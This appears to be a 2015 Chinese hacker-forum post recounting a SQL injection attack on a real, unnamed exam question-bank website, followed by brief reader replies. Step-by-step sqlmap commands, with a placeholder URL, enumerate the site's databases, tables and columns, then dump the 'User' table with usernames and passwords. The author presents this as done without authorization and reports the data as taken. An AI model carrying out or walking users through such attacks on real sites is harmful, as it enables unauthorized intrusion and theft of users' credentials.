【原创】sqlmap之某考试题库站点
本帖最后由 Msl 于 2015-4-12 01:13 编辑http://ihonker.sinaapp.com/v/MP3/ihonker001.mp3
#请遵守计算机法律!
注意!本文章仅作交流使用,造成他人犯罪与作者无关!
目标:某考试题库站点 ---Msl QQ:1920168505
确定注入点后,在放到sqlmap里检测下
打开终端,输入sqlmap –u http://www.xxx.com/xx.asp?id=xx
从上图可看出,此站点存在注入,而且这个注入点是对的
目标系统为Windows 2012 R2版本
IIS版本8.5
数据库mssqlserver 2012
为了节省时间,我就直接找有用的数据吧···
列出数据库
sqlmap –u http://www.xxx.com/xx.asp?id=xx –dbs
2.从上图可看出,目标站点数据库已经列出来了,上面三个是系统的,最下边的才是我想要的···
接下来获取它的表
sqlmap –u http://www.xxx.com/xx.asp?id=xx--tables “xxx”
出来了,接下来先看看User列
sqlmap –u http://www.xxx.com/xx.asp?id=xx--columns -T “User” -D “xxx”
如果想单独获取username和password
可以输入
sqlmap –u http://www.xxx.com/xx.asp?id=xx--dump –C “username,password” -T “User” -D “xxx”
我就直接全脱出来吧
sqlmap –u http://www.xxx.com/xx.asp?id=xx--dump -T “User” -D “xxx”
由于网络问题,所以我改成了这个
上图是效果图···
好了,就到这里吧,后面就不给大家看了,毕竟数据公开不好~.~
附上本人百度网盘分享链接http://pan.baidu.com/share/home?uk=3155889364&view=share#category/type=0
挑选你需要的教程保存即可(别说我分享的太多你保存起来慢。。。)
这是SQLmap科普吗? 分享万岁。。。~\(≧▽≦)/~ 学习学习技术,加油! 还是不错的哦,顶了 还是不错的哦,顶了 还是不错的哦,顶了 支持中国红客联盟(ihonker.org)
页:
[1]